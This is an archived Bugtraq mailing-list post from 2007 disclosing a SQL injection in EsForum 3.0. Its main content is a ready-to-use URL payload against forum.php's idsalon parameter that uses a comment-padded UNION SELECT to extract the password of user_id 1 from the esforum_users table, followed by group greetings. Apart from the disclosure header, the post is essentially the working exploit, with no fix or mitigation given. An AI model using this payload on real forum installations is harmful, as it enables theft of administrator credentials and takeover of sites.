[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

EsForum <= 3.0 SQL Injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: EsForum <= 3.0 SQL Injection Vulnerability
From: ilkerkandemir@xxxxxxxxx
Date: 22 Apr 2007 15:45:03 -0000

-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...


Script: EsForum v3.0
Script Download: http://www.editeurscripts.com/scripts/dl-esforum-3.html

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:
*/ MEFISTO Begins. */

-------------------------------------------------------------------------------------------------------------------
Exploit: 

forum.php?idsalon='/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users%20where%20user_id=1/*

-------------------------------------------------------------------------------------------------------------------


Tnx:H0tturk,Dr.Max Virus,Gencnesil,CodeR,Ajann
Special Tnx: AYYILDIZ.ORG

Prev by Date: lms 1.5.3 Remote File Inclusion
Next by Date: PHPMyBibli <= Multiple Remote File Include
Previous by thread: lms 1.5.3 Remote File Inclusion
Next by thread: PHPMyBibli <= Multiple Remote File Include
Index(es):
- Date
- Thread